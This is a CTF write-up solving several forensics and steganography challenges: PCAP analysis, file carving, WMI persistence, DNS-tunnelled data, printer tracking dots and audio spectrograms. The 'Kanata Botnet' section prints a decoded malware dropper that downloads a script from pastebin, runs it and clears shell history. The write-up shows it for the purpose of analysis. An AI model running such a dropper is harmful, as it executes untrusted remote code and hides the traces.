💡 Some Digital Forensics and Steganography challenges on the [Cookie Arena](https://battle.cookiearena.org/challenges/digital-forensics) platform

# File Extension

> *Description: Is real photo?*

I opened the file in HxD and the first two bytes are `4D 5A` (`MZ`). These are the first two bytes of the header of a 16-bit DOS MZ executable, whose extension is `.exe`. So I changed the extension and ran the file in the terminal.

![Screenshot_2023-06-18_194520](https://hackmd.io/_uploads/Hk30YWSVp.png)

---

# Streamer

> *Description: PCAP stands for "Packet Capture." It refers to a file format and a common method for capturing and storing network traffic data. PCAP files are widely used in network analysis and troubleshooting to capture packets flowing through a network interface.*
>
> *To extract files from a PCAP (Packet Capture) file through TCP streams, you can use various tools and scripts. One popular tool for this purpose is Wireshark, a network protocol analyzer that allows you to inspect and extract data from captured packets.*
>
> *When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`*

I opened the file in Wireshark, went to File -> Export Objects -> HTTP and exported all files. Checking evilcontent.zip I found a flag.txt, but opening it required a password. So I checked the .php files and found the password in login.php.

![Screenshot_2023-06-18_195611](https://hackmd.io/_uploads/Hy5ff13w6.png)

---

# Thumbnail

- **File: thumb.db**

*Description: In Windows, `thumbs.db` files are database files containing the small images displayed when you view a folder in Thumbnail view (as opposed to Tile, Icon, List, or Detail view). These files are automatically generated by Windows, and there is no harm in deleting them or excluding them from system backups.*

At first I tried opening it with `Thumbcache viewer`, but that was not the right tool, so I just used CyberChef to extract the contents quickly. There are many jpg images inside, and one of them is the flag.
![Screenshot_2023-06-18_213011](https://hackmd.io/_uploads/S1IEfyhvT.png)

---

# Basic Image

- **File: bruteme.xlsx**

*Description: Photo metadata is data attached to image files that describes what the file is, when the image was taken, where it was taken, and how the file has been modified. Whenever a photo is taken digitally, the image is stored alongside its descriptive metadata.*

*`ExifTool` is a free and open source software program which is used to read, write and update metadata of various types of files such as PDF, Audio, Video and images.*

*When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`*

Following the challenge description, I renamed bruteme.xlsx to bruteme.zip and unzipped it. Checking the contents of the xml files, I found the flag in sharedStrings.xml.

---

# Online Camera

- **File: WebCam.png**

*Description: You get a photo of a place taken from a online camera. Use `https://holidaylivecam.com/camera/search?tag%5B%5D=schools_universities` to find the place*

*Please check where the photo was taken*

*FLAG Format is CHH{NAME_OF_PLACE}, for example CHH{Hong_Kong_Island}*

I used Google Images to search for the photo. It came back as this university, and then I looked up its address.

---

# Audacity

- **File: squitgame.wav**

*Description:*

*The Spectrogram View of an audio track provides a visual indication of how the energy in different frequency bands changes over time. The Spectrogram can show sudden onset of a sound, so it can often be easier to see clicks and other glitches or to line up beats in this view rather than in one of the waveform views.*

*When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`*

Following the description, I opened the file in `Audacity` and switched the view to `Spectrogram`. Listening to it, there is a section with rather shrill sounds, so I guessed this is data hidden in the spectrum.
I tweaked the Spectrogram Settings a little and the flag appeared.

![Screenshot_2023-06-19_140419](https://hackmd.io/_uploads/H1uFG1hvp.png)

---

# From The Above

- **File: ufo.wav**

*Every day multiple NOAA weather satellites pass above you. Each NOAA weather satellite broadcasts an Automatic Picture Transmission (APT) signal, which contains a live weather image of your area.*

*We have an APT audio recording. Could you decode it? When you got a message `Flag{XXX}`, please submit the flag with format `CHH{XXX}`*

Following the description, I read up on APT and NOAA and found a tool, noaa-apt, that decodes APT audio recordings. Below is the tool's interface.

![Untitled](https://hackmd.io/_uploads/ryq9fknPT.png)

I decoded the recording from the challenge and saved the decoded image.

![image](https://hackmd.io/_uploads/Hk7eQ1nDa.png)

---

# Kanata Botnet

- **File: payload.py**

*Description: Recently we detected some unusual services running on our Linux server. We suspect it is being abused to distribute malicious payloads. After sweeping the server, we found a file that appears to be the origin of the incident. Please help us analyse it to find the CnC address hosting the payload*

In this Python file, one notable part is a cmd encoded in base64.
```python
def exploitmake(cmd):
    subprocess.call(cmd, shell=True)

encoded = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvelltOHBWY3ogLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
exploit = str(base64.b64decode(encoded))
```

Decoding it gives:

```text
exploit = cd /tmp; wget https://pastebin.com/raw/zYm8pVcz -O a > /dev/null 2>&1; chmod 777 a; sh a > /dev/null 2>&1; rm -rf a; history -c; clear;
```

Visit the link https://pastebin.com/raw/zYm8pVcz to get the flag.

---

# Yellow Whistleblower

- **File: huong-dan-ve-ga-cookiehanhoan.pdf**

*Description: A Machine Identification Code (MIC), also known as printer steganography, yellow dots, tracking dots, or secret dots, is a digital watermark that certain color laser printers and copiers leave on every printed page, allowing identification of the device which was used to print a document and giving clues to the originator.*

*Developed by Xerox and Canon in the mid-1980s, its existence became public only in 2004. In 2018, scientists developed privacy software to anonymize prints to support whistleblowers publishing their work.*

**The flag format is CHH{Manufacturer-YYYYMMDD-HHMM}**

- *YYYY: Year*
- *MM: Month*
- *DD: Day*
- *HH: Hour*
- *MM: Minute*
- *Manufacturer: Name of printer (eg, Epson, Dell, HP,..)*

A Machine Identification Code (MIC), also known as yellow dots (among many other names), roughly means that a printed page carries tiny secret dots, hard to see with the naked eye, which identify the printer used to print that page.

After downloading the .pdf I used `pdftoppm` to convert it to an image.

```bash
$ pdftoppm huong-dan-ve-ga-cookiehanhoan.pdf pic -png
```

After some research I found a GitHub project that analyses yellow dots: [deda](https://github.com/dfd-tud/deda). First I installed it following its instructions.
```bash
$ pip3 install --user deda
$ pip3 install --user wand
```

Then I tried it with `deda_parse_print pic-1.png`, but got an error:

```
raise ImportError('MagickWand shared library not found.\n'
ImportError: MagickWand shared library not found.
You probably had not installed ImageMagick library.
Try to install:
  https://docs.wand-py.org/en/latest/guide/install.htm
```

So I had to install the ImageMagick library as well: `sudo apt install libmagickwand-dev`

Running `deda_parse_print` again gave me the following printer information:

![Untitled 1](https://hackmd.io/_uploads/rkjnXynPp.png)

---

# Event Subscription

- **Folder: Repository**

*Description: Our CSIRT team has been asked to handle an incident on a server that we already finished handling a few days ago. So we believe there is still some attacker persistence mechanism that we missed*

This was the first time I had seen files with extensions like these, so they were quite unfamiliar.

![Screenshot_2023-06-20_185338](https://hackmd.io/_uploads/BkVCXJnPp.png)

At first my searches turned up nothing, because I used the wrong keywords and only searched for what the extension was. After getting a hint, I found that this Repository is the `WMI Repository`. Details on WMI are on [this page](https://netsecninja.github.io/dfir-notes/wmi-forensics/). I also referred to the [write-up](https://www.hackthebox.com/blog/perseverance-biz-ctf-2022-forensics-writeup) of a fairly similar challenge.

The first step was to read the OBJECTS.DATA file: I git cloned the [WMI_Forensics](https://github.com/davidpany/WMI_Forensics) repo and ran [`PyWMIPersistenceFinder.py`](https://github.com/davidpany/WMI_Forensics/blob/master/PyWMIPersistenceFinder.py).

```bash
$ python2 PyWMIPersistenceFinder.py OBJECTS.DATA
```

Finally I got the list of bindings:
![Screenshot_2023-06-20_210613](https://hackmd.io/_uploads/SJieEyhDT.png)

The arguments of the first consumer looked encoded, so I tried a base64 decode and got the flag right away.

---

# Ecoji

- **Folder: Packages**

*Description: Annie suspects her husband has a mistress because he frequently uses Windows emoji to text, as a form of message encryption. So while her husband is away, she decided to do forensics to see what he has been texting*

At first I looked at the `$I30` files. These are `NTFS $I30 Index Attributes`; roughly speaking, they record that a file was present in a directory along with other related information (file name, creation time, size... see the details [here](https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/)). I tried parsing a few $I30 files and found nothing extra, so I changed direction. Since this challenge is about Ecoji, I searched online and found a [blog](https://www.sans.org/blog/ntfs-i30-index-attributes-evidence-of-deleted-and-overwritten-files/) about where ecoji data lives in the file system. The path is `Packages/MicrosoftWindows.Client.CBS_cw5n1h2txyewy/Settings/setting.dat`

![Untitled 2](https://hackmd.io/_uploads/HkpVVy3Da.png)

With `Replace input with output` we can see the ecoji in this file. Before each picture there is a number, which I guess is a usage count, so I took only the ecoji preceded by a 1.

![Untitled 3](https://hackmd.io/_uploads/S15L4k2DT.png)

🍨🧬🤛🍔🚃👩🐰🖖🚂💅🛁📰🍌️🧙‍♂️

Then I tried decoding it countless times in every possible order without getting anything, so I tried encoding the flag format instead. (The repo used to decode and encode ecoji is [here](https://github.com/keith-turner/ecoji).)

![Screenshot_2023-06-27_004241](https://hackmd.io/_uploads/H1zOVJnv6.png)

![Untitled 4](https://hackmd.io/_uploads/BJVKNJnv6.png)

From the two images above I guessed that the ecoji has to be reversed.
🧙‍♂️🍌📰🛁💅🚂🖖🐰👩🚃🍔🤛🧬🍨

![Untitled 5](https://hackmd.io/_uploads/rJXqVy3Pa.png)

---

# Dismantling

- **File: dismantling.pcap**

*Description: Be careful with Alternative Protocol*

After opening the file I saw quite a few different protocols. Scrolling through everything, I picked out DNS, which had some very strange queries.

![Untitled 6](https://hackmd.io/_uploads/Bk3cN13wT.png)

The queried domains do not exist, and the part before .cookiearena is always a hex string. First I exported the data with tshark.

```bash
tshark -r Dismantling.pcap -Y "dns and ip.src == 192.168.25.135" -T fields -e dns.qry.name > output
```

The file looks like this:

![Untitled 7](https://hackmd.io/_uploads/rJOs413D6.png)

So next I wrote a Python script to pull out the hex part.

```python
s = ""
with open(r"Dismantiling\output", "r") as file:
    for line in file:
        line = line.strip()  # strip whitespace and the trailing newline
        parts = line.split(".cookiearena.org")
        s += parts[0]  # keep only the hex label in front of the domain

with open(r"Dismantiling\hexfile.txt", "w") as file:
    file.write(s)
```

```bash
cat hexfile.txt | xxd -r -p > out
file out
```

![Untitled 8](https://hackmd.io/_uploads/S1034khwT.png)

This is an Excel file, so I renamed it to out.xlsx and opened it.

![Untitled 9](https://hackmd.io/_uploads/HJLT4khwp.png)

---

# Can you see me?

- **File: s3cr3t.png**

*Description: Working with image files should be the first step for anyone learning cybersecurity.*

First I ran exiftool to look at the image's information.

![Untitled 10](https://hackmd.io/_uploads/BkkCNk3PT.png)

The comment field has something odd in it, and the png is also corrupt. Let me check what is wrong with it: `pngcheck -v s3cr3t.png`

![Untitled 11](https://hackmd.io/_uploads/B1gkSkhD6.png)

I looked for where the `00 4e 00 47` chunk sits.

![Untitled 12](https://hackmd.io/_uploads/HkdkS1hvT.png)

You can see that another png image is hidden in there. I will extract this part, and since there are columns of 00 in between I will drop those as well.
```python
# Hex dump of the hidden image as copied from HxD; every second byte is a 00 column
data = """89 00 50 00 4E 00 47 00 0D 00 0A 00 1A 00 0A 00 00 00 00 00 00 00 0D 00 49 00 48 00 44 00 52 00 00 00 00 00 00 00 FA 00 00 00 00 00 00 00 FA 00 08 00 02 00 00 00 00 00 00 00 07 00 8E 00 CD 00 6A 00 00 00 00 00 0D 00 C3 00 49 00 44 00 41 00 54 00 78 00 9C 00 ED 00 DD 00 4F 00 A8 00 AE 00 55 00 15 00 C7 00 F1 00 AF 00 47 00 F3 00 6F 00 54 00 84 00 8A 00 98 00 88 00 23 00 9D 00 35 00 12 00 A9 00 91 00 14 00 06 00 41 00 16 00 37 00 A8 00 28 00 6A 00 90 00 29 00 35 00 C8 00 82 00 24 00 4D 00 10 00 4B 00 03 00 9D 00 4A 00 D0 00 A4 00 E8 00 0F 00 84 00 0D 00 9A 00 39 00 0A 00 42 00 48 00 A2 00 A0 00 46 00 41 00 D1 00 20 00 25 00 C4 00 20 00 E9 00 5E 00 2A 00 EC 00 9F 00 50 00 A0 00 FC 00 1A 00 2C 00 0F 00 67 00 79 00 F7 00 79 00 9E 00 9E 00 7B 00 DF 00 F7 00 5C 00 9F 00 67 00 AD 00 DF 00 CB 00 82 00 F7 00 7D 00 9F 00 3F 00 FB 00 D9 00 67 00 EF 00 75 00 3F 00 AC 00 7D 00 D8 00 F7 00 5E 00 24 00 A4 00 53 00 12 00 D2 00 07 00 24 00 A4 00 8B 00 25 00 A4 00 4B 00 24 00 A4 00 2B 00 25 00 0E 00 E3 00 8A 00 F4 00 39 00 C7 00 9B 00 25 00 A4 00 AF 00 4A 00 48 00 BF 00 94 00 90 00 3E 00 26 00 21 00 3D 00 23 00 21 00 FD 00 57 00 42 00 BA 00 45 00 42 00 7A 00 5A 00 42 00 BA 00 69 00 A2 00 9D 00 AB 00 27 00 8E 00 5F 00 9E 00 3E 00 DF 00 90 00 3E 00 7F 00 56 00 42 00 BA 00 57 00 42 00 BA 00 4B 00 42 00 FA 00 9C 00 84 00 F4 00 4E 00 09 00 E9 00 CB 00 12 00 D2 00 83 00 E9 00 F3 00 47 00 25 00 A4 00 8F 00 0C 00 3F 00 4B 00 FC 00 BC 00 1F 00 97 00 90 00 EE 00 90 00 90 00 1E 00 91 00 90 00 EE 00 91 00 90 00 1E 00 9F 00 38 00 7E 00 7F 00 6A 00 FF 00 AA 00 D4 00 DA 00 45 00 69 00 F4 00 4E 00 A7 00 F6 00 73 00 CC 00 9F 00 7D 00 4E 00 42 00 BA 00 4F 00 42 00 BA 00 46 00 42 00 7A 00 40 00 42 00 BA 00 55 00 42 00 FA 00 9E 00 84 00 F4 00 0F 00 09 00 E9 00 61 00 09 00 E9 00 FD 00 12 00 D2 00 F3 00 12 00 D2 00 7B 00 25 00 A4 00 EB 00 25 00 A4 00 7F 00 49 00 48 00 77 00 4B 00 48 00 9F 00 94 00 90 00 7E 00 25 00 21 00 DD 00 9E 00 7A 00 FE 00 13 00 09 00 E9 00 7D 00 12 00 D2 00 87 00
25 00 A4 00 2F 00 4A 00 48 00 0F 00 49 00 48 00 2F 00 49 00 48 00 3F 00 94 00 90 00 5E 00 96 00 90 00 9E 00 95 00 90 00 FE 00 22 00 21 00 3D 00 26 00 21 00 FD 00 4E 00 42 00 7A 00 54 00 42 00 BA 00 76 00 C8 00 A5 00 CB 00 D2 00 0C 00 EE 00 2B 00 1F 00 72 00 FB 00 31 00 DA 00 07 00 12 00 D2 00 8D 00 69 00 3C 00 27 00 F3 00 36 00 37 00 74 00 21 00 13 00 F7 00 BA 00 89 00 6B 00 72 00 5C 00 34 00 71 00 FC 00 C9 00 34 00 C4 00 53 00 B1 00 CB 00 1F 00 86 00 37 00 A5 00 76 00 E6 00 FF 00 30 00 9C 00 5C 00 D2 00 E7 00 49 00 8D 00 FE 00 5C 00 BA 00 78 00 AC 00 F2 00 E7 00 0F 00 4D 00 5C 00 7F 00 DF 00 82 00 F1 00 CF 00 7D 00 28 00 82 00 20 00 B3 00 13 00 6F 00 05 00 9B 00 2A 00 98 00 A2 00 14 00 82 00 F1 00 66 00 05 00 AD 00 60 00 8B 00 52 00 30 00 2E 00 B2 00 82 00 56 00 30 00 47 00 D9 00 52 00 70 00 C9 00 60 00 59 00 C1 00 76 00 0A 00 4A 00 94 00 44 00 70 00 79 00 42 00 E4 00 07 00 58 00 C1 00 88 00 B2 00 0A 00 2E 00 18 00 AB 00 4D 00 22 00 38 00 D5 00 09 00 2B 00 18 00 D1 00 54 00 C1 00 C5 00 F9 00 90 00 DB 00 DF 00 00 00 82 00 F1 00 C5 00 0A 00 5A 00 C1 00 16 00 A5 00 E0 00 01 00 00 00 67 00 00 00 B8 00 04 00 80 00 D3 00 00 00 5C 00 CC 00 D9 00 AF 00 8B 00 27 00 CE 00 7E 00 0A 00 80 00 4F 00 00 00 70 00 1F 00 00 00 D7 00 00 00 F0 00 00 00 00 00 B7 00 02 00 F0 00 2E 00 00 00 1E 00 03 00 E0 00 06 00 00 00 FE 00 08 00 C0 00 53 00 00 00 FC 00 1A 00 80 00 1F 00 00 00 F0 00 35 00 00 00 DE 00 02 00 C0 00 65 00 00 00 FC 00 1C 00 80 00 DB 00 01 00 B8 00 1F 00 80 00 BB 00 00 00 B8 00 08 00 80 00 DF 00 00 00 70 00 25 00 00 00 97 00 02 00 F0 00 15 00 00 00 BE 00 0D 00 C0 00 CB 00 00 00 FC 00 1E 00 80 00 3F 00 03 00 F0 00 DD 00 74 00 D7 00 A3 00 00 00 5C 00 0B 00 C0 00 9D 00 00 00 DC 00 0D 00 1C 00 8E 00 C3 00 E5 00 00 00 3C 00 03 00 C0 00 8F 00 00 00 F8 00 03 00 00 00 3F 00 06 00 E0 00 7A 00 8E 00 7F 00 5D 00 0D 00 80 00 D2 00 91 00 F8 00 7C 00 0A 00 80 00 57 00 53 00 CF 00 63 00 E4 00 6F 00 04 00 E0 00 1B 00 E9 00 A7 00 88 00 D7 00 15 00 43 00 CB 00 4F 00 01 00 F0 00 33 00 00 00 
1E 00 02 00 0E 00 47 00 E6 00 CE 00 D4 00 CF 00 BF 00 03 00 70 00 0B 00 00 00 4F 00 03 00 70 00 13 00 00 00 FF 00 06 00 E0 00 EB 00 00 00 BC 00 1B 00 80 00 9F 00 02 00 F0 00 1E 00 E0 00 70 00 9C 00 9F 00 05 00 E0 00 83 00 00 00 BC 00 00 00 C0 00 75 00 43 00 1F 00 FE 00 3A 00 1C 00 89 00 9F 00 E5 00 3F 00 E9 00 C8 00 9F 00 00 00 78 00 12 00 80 00 77 00 00 00 F0 00 4D 00 00 00 BE 00 0F 00 C0 00 B7 00 00 00 F8 00 2D 00 00 00 FF 00 4C 00 7D 00 FB 00 1B 00 00 00 6F 00 07 00 E0 00 39 00 00 00 3E 00 0F 00 C0 00 83 00 00 00 7C 00 09 00 38 00 1C 00 BD 00 B7 00 01 00 87 00 B9 00 F4 00 1D 00 00 00 1E 00 06 00 0E 00 47 00 FE 00 17 00 C0 00 61 00 8E 00 BD 00 94 00 EE 00 FA 00 02 00 00 00 57 00 8D 00 26 00 59 00 41 00 2B 00 B8 00 AF 00 7C 00 58 00 5D 00 29 00 18 00 DD 00 72 00 2D 00 78 00 AE 00 FD 00 F4 00 82 00 38 00 C7 00 66 00 10 00 CC 00 03 00 61 00 05 00 AD 00 60 00 F1 00 05 00 71 00 BC 00 59 00 41 00 2B 00 38 00 F6 00 A1 00 20 00 82 00 0C 00 13 00 6F 00 05 00 AD 00 60 00 D9 00 52 00 30 00 0E 00 59 00 C1 00 1C 00 56 00 B0 00 6C 00 29 00 18 00 37 00 58 00 41 00 2B 00 D8 00 A2 00 14 00 9C 00 1A 00 2C 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 CE 00 27 00 44 00 7E 00 80 00 15 00 8C 00 68 00 A1 00 E0 00 C4 00 58 00 6D 00 1E 00 C1 00 DC 00 90 00 15 00 8C 00 B0 00 82 00 F3 00 F9 00 90 00 DB 00 DF 00 18 00 82 00 C7 00 5E 00 77 00 56 00 EA 00 8C 00 61 00 05 00 E7 00 C7 00 6A 00 F3 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 DC 00 F0 00 3E 00 19 00 EF 00 93 00 79 00 01 00 A8 00 B9 00 4F 00 06 00 0E 00 67 00 E4 00 D5 00 25 00 CE 00 59 00 C1 00 76 00 0A 00 EE 00 90 00 0F 00 AB 00 2E 00 05 00 A3 00 8B 00 AE 00 05 00 97 00 F4 00 D3 00 0B 00 E2 00 1C 00 9B 00 44 00 30 00 4E 00 AC 00 2D 00 99 00 AC 00 A0 00 17 00 C4 00 B9 00 FD 00 BD 00 21 00 18 00 87 00 AC 00 A0 00 15 00 6C 00 51 00 0A 00 8E 00 3F 00 8C 00 15 00 B4 00 82 00 65 00 4B 00 C1 00 38 00 6D 00 05 00 AD 00 60 00 8B 00 52 00 30 00 6E 00 B6 00 82 00 56 00 B0 00 45 00 29 00 38 00 35 00 70 00 56 00 B0 00 B5 00 82 00 12 00 25 00 11 00 
1C 00 4F 00 E4 00 07 00 58 00 C1 00 88 00 76 00 0A 00 4E 00 7C 00 DE 00 3C 00 82 00 53 00 9D 00 B3 00 82 00 AD 00 15 00 1C 00 22 00 B7 00 BF 00 61 00 04 00 C7 00 1B 00 AC 00 A0 00 15 00 2C 00 5B 00 0A 00 1E 00 0C 00 3B 00 22 00 BC 00 4F 00 C6 00 FB 00 64 00 6A 00 ED 00 93 00 39 00 BA 00 F2 00 C5 00 FC 00 A7 00 CA 00 0A 00 5A 00 C1 00 E2 00 A5 00 60 00 74 00 D7 00 B5 00 A0 00 17 00 C4 00 2D 00 4A 00 C1 00 B8 00 68 00 0D 00 C9 00 64 00 05 00 57 00 A4 00 A0 00 44 00 49 00 04 00 D9 00 53 00 47 00 AD 00 60 00 8E 00 CD 00 2B 00 28 00 51 00 12 00 C1 00 25 00 13 00 6F 00 05 00 DB 00 29 00 B8 00 A7 00 7E 00 AE 00 0E 00 41 00 D2 00 17 00 2B 00 38 00 46 00 EE 00 43 00 23 00 05 00 17 00 CC 00 FB 00 26 00 11 00 8C 00 86 00 AC 00 20 00 C3 00 64 00 E7 00 68 00 A7 00 60 00 FA 00 5C 00 0A 00 C1 00 7C 00 C2 00 0A 00 5A 00 C1 00 E2 00 A5 00 20 00 C3 00 03 00 AC 00 60 00 44 00 6B 00 05 00 D3 00 E7 00 52 00 08 00 E6 00 13 00 56 00 D0 00 0A 00 E6 00 C8 00 ED 00 17 00 41 00 30 00 A7 00 CE 00 18 00 56 00 70 00 8C 00 16 00 0A 00 A6 00 28 00 85 00 60 00 EC 00 E8 00 F0 00 3E 00 19 00 EF 00 93 00 A9 00 BB 00 4F 00 06 00 8E 00 B2 00 DA 00 0A 00 5A 00 C1 00 89 00 19 00 2F 00 58 00 0A 00 46 00 D7 00 5D 00 0B 00 E6 00 F0 00 82 00 38 00 47 00 29 00 04 00 C7 00 9B 00 AD 00 A0 00 15 00 2C 00 BB 00 20 00 66 00 87 00 8E 00 5A 00 C1 00 1C 00 A5 00 14 00 1C 00 A2 00 08 00 82 00 4C 00 4C 00 BC 00 15 00 6C 00 AD 00 E0 00 0E 00 FD 00 5C 00 35 00 82 00 71 00 9B 00 15 00 9C 00 EA 00 43 00 53 00 05 00 27 00 E6 00 7D 00 F3 00 08 00 46 00 A3 00 56 00 70 00 8C 00 D6 00 0A 00 4A 00 94 00 44 00 70 00 EA 00 06 00 2B 00 D8 00 5A 00 41 00 89 00 92 00 08 00 E6 00 E1 00 B6 00 82 00 56 00 30 00 A2 00 6C 00 29 00 98 00 BF 00 58 00 41 00 2B 00 98 00 DB 00 2F 00 88 00 E0 00 78 00 C2 00 0A 00 4E 00 0E 00 D6 00 F0 00 B9 00 AC 00 82 00 E9 00 73 00 29 00 04 00 0F 00 5E 00 B7 00 A3 00 00 00 BC 00 4F 00 E6 00 F5 00 2F 00 EF 00 93 00 D9 00 FE 00 3E 00 19 00 80 00 57 00 5E 00 3B 00 6B 00 05 00 AD 00 E0 00 A8 00 E0 00 C4 00 D9 00 
CD 00 97 00 82 00 A4 00 64 00 72 00 2D 00 18 00 E1 00 05 00 71 00 D9 00 52 00 30 00 DE 00 AC 00 A0 00 15 00 6C 00 B1 00 20 00 3E 00 B6 00 95 00 99 00 8E 00 5A 00 C1 00 1C 00 65 00 15 00 94 00 28 00 89 00 20 00 69 00 E2 00 AD 00 A0 00 15 00 2C 00 5E 00 0A 00 E6 00 86 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 C6 00 03 00 AC 00 60 00 84 00 15 00 2C 00 5E 00 0A 00 E6 00 1B 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 C6 00 09 00 2B 00 68 00 05 00 5B 00 94 00 82 00 FB 00 9A 00 78 00 2B 00 58 00 4A 00 41 00 89 00 92 00 08 00 C6 00 9B 00 15 00 9C 00 1F 00 AC 00 76 00 0A 00 EE 00 69 00 DE 00 57 00 87 00 60 00 EC 00 F4 00 F0 00 3E 00 99 00 FC 00 F2 00 3E 00 99 00 5A 00 FB 00 64 00 F2 00 59 00 2B 00 68 00 05 00 67 00 CF 00 96 00 2A 00 05 00 F3 00 14 00 BA 00 16 00 9C 00 0F 00 2F 00 88 00 37 00 8F 00 60 00 7C 00 B1 00 82 00 56 00 30 00 27 00 53 00 D9 00 05 00 F1 00 92 00 8E 00 5A 00 C1 00 1C 00 2D 00 14 00 94 00 28 00 89 00 20 00 17 00 3C 00 21 00 AC 00 E0 00 7C 00 42 00 E4 00 F6 00 5D 00 0A 00 46 00 EC 00 0D 00 C1 00 78 00 B3 00 82 00 56 00 30 00 CF 00 7B 00 D9 00 52 00 30 00 1E 00 66 00 05 00 AD 00 60 00 8B 00 52 00 F0 00 FF 00 8E 00 3E 00 56 00 B0 00 A1 00 82 00 12 00 25 00 11 00 8C 00 8B 00 D6 00 96 00 B8 00 56 00 D0 00 A5 00 E0 00 89 00 20 00 C8 00 0E 00 13 00 6F 00 05 00 CB 00 2A 00 28 00 B1 00 BE 00 C4 00 DD 00 03 00 82 00 F3 00 37 00 5B 00 C1 00 88 00 76 00 0A 00 EE 00 30 00 EF 00 AB 00 46 00 30 00 76 00 7D 00 78 00 9F 00 8C 00 F7 00 C9 00 D4 00 DD 00 27 00 73 00 F4 00 BA 00 D9 00 0A 00 5A 00 C1 00 46 00 A5 00 20 00 7B 00 4A 00 88 00 FC 00 80 00 46 00 B5 00 E0 00 EC 00 BD 00 2E 00 05 00 23 00 56 00 84 00 60 00 9C 00 B0 00 82 00 56 00 B0 00 C5 00 82 00 F8 00 D8 00 A3 00 58 00 C1 00 D7 00 47 00 3B 00 05 00 25 00 4A 00 22 00 C8 00 05 00 49 00 08 00 2B 00 38 00 9F 00 10 00 B9 00 FD 00 55 00 28 00 38 00 71 00 7C 00 F3 00 08 00 C6 00 A1 00 47 00 24 00 AC 00 E0 00 61 00 AC 00 21 00 99 00 5C 00 0A 00 9E 00 08 00 82 00 F1 00 60 00 2B 00 68 00 05 00 5B 00 94 00 82 00 53 00 8D 00 E6 00 
4E 00 58 00 C1 00 3C 00 F1 00 2D 00 14 00 94 00 28 00 89 00 20 00 C3 00 64 00 E7 00 B0 00 82 00 4D 00 15 00 9C 00 88 00 DC 00 87 00 4D 00 22 00 C8 00 39 00 4E 00 BC 00 15 00 6C 00 A1 00 E0 00 30 00 D7 00 39 00 36 00 8C 00 E0 00 78 00 91 00 15 00 8C 00 68 00 AD 00 E0 00 39 00 CE 00 FB 00 66 00 10 00 8C 00 1D 00 20 00 DE 00 27 00 43 00 FA 00 7C 00 0A 00 F0 00 3E 00 99 00 3A 00 FB 00 64 00 00 00 9E 00 07 00 E0 00 36 00 AC 00 A0 00 15 00 1C 00 15 00 94 00 28 00 59 00 0A 00 B2 00 43 00 42 00 E4 00 07 00 34 00 AD 00 05 00 87 00 70 00 29 00 18 00 B1 00 52 00 04 00 E3 00 22 00 2B 00 B8 00 3C 00 21 00 5A 00 28 00 B8 00 43 00 3E 00 E4 00 F6 00 57 00 87 00 60 00 3E 00 61 00 05 00 73 00 B4 00 56 00 50 00 A2 00 24 00 82 00 9C 00 58 00 42 00 58 00 C1 00 F9 00 84 00 C8 00 ED 00 AF 00 4E 00 C1 00 14 00 A5 00 10 00 8C 00 D3 00 56 00 70 00 0D 00 C9 00 B4 00 22 00 05 00 4F 00 2C 00 1F 00 DE 00 60 00 04 00 A3 00 13 00 56 00 D0 00 0A 00 B6 00 28 00 05 00 A7 00 3A 00 61 00 05 00 F3 00 C4 00 B7 00 53 00 50 00 A2 00 24 00 82 00 63 00 43 00 56 00 D0 00 0A 00 4E 00 F5 00 61 00 F3 00 08 00 B2 00 60 00 E2 00 AD 00 60 00 3B 00 05 00 87 00 28 00 82 00 60 00 BC 00 59 00 C1 00 08 00 2B 00 58 00 BC 00 14 00 8C 00 DD 00 20 00 DE 00 27 00 73 00 0A 00 F0 00 3E 00 99 00 9A 00 FB 00 64 00 00 00 9E 00 78 00 ED 00 E7 00 B2 00 82 00 56 00 70 00 54 00 50 00 A2 00 64 00 29 00 78 00 EC 00 AC 00 CF 00 24 00 44 00 7E 00 80 00 6B 00 C1 00 08 00 97 00 82 00 11 00 1B 00 40 00 30 00 6E 00 B8 00 69 00 A2 00 21 00 2B 00 18 00 D1 00 4E 00 C1 00 73 00 CC 00 87 00 DC 00 FE 00 AA 00 11 00 CC 00 5F 00 AC 00 A0 00 15 00 2C 00 5E 00 0A 00 1E 00 A4 00 02 00 FF 00 0C 00 70 00 B8 00 10 00 3C 00 3D 00 94 00 FF 00 A4 00 23 00 E3 00 59 00 FF 00 47 00 C4 00 F9 00 E5 00 05 00 F1 00 5A 00 17 00 C4 00 56 00 D0 00 0A 00 8E 00 0A 00 EE 00 35 00 1F 00 56 00 54 00 0A 00 46 00 87 00 5C 00 0B 00 7A 00 41 00 DC 00 A2 00 14 00 24 00 75 00 C2 00 0A 00 E6 00 89 00 6F 00 AD 00 A0 00 44 00 49 00 04 00 E3 00 CD 00 0A 00 5A 00 C1 00 A9 00 3E 00 
94 00 42 00 90 00 89 00 89 00 B7 00 82 00 AD 00 15 00 94 00 28 00 89 00 60 00 7C 00 B1 00 82 00 63 00 B4 00 56 00 70 00 62 00 DE 00 37 00 8F 00 E0 00 41 00 FA 00 95 00 8D 00 7F 00 2D 00 E8 00 5F 00 0B 00 56 00 DC 00 27 00 03 00 F0 00 19 00 00 00 DE 00 6A 00 05 00 AD 00 60 00 A3 00 52 00 70 00 49 00 42 00 E4 00 07 00 B8 00 16 00 8C 00 F0 00 82 00 38 00 62 00 63 00 08 00 8E 00 0D 00 59 00 C1 00 88 00 D6 00 0A 00 2E 00 C8 00 87 00 DC 00 FE 00 66 00 10 00 3C 00 F6 00 8A 00 B3 00 C2 00 0A 00 B6 00 53 00 70 00 88 00 22 00 08 00 C6 00 E2 00 CC 00 FB 00 64 00 BC 00 20 00 EE 00 B1 00 20 00 B6 00 82 00 56 00 70 00 54 00 70 00 E7 00 7C 00 58 00 69 00 29 00 18 00 9D 00 73 00 2D 00 B8 00 BC 00 9F 00 5E 00 10 00 E7 00 D8 00 18 00 82 00 B9 00 D3 00 6B 00 4B 00 26 00 2B 00 E8 00 05 00 71 00 6E 00 7F 00 0F 00 08 00 C6 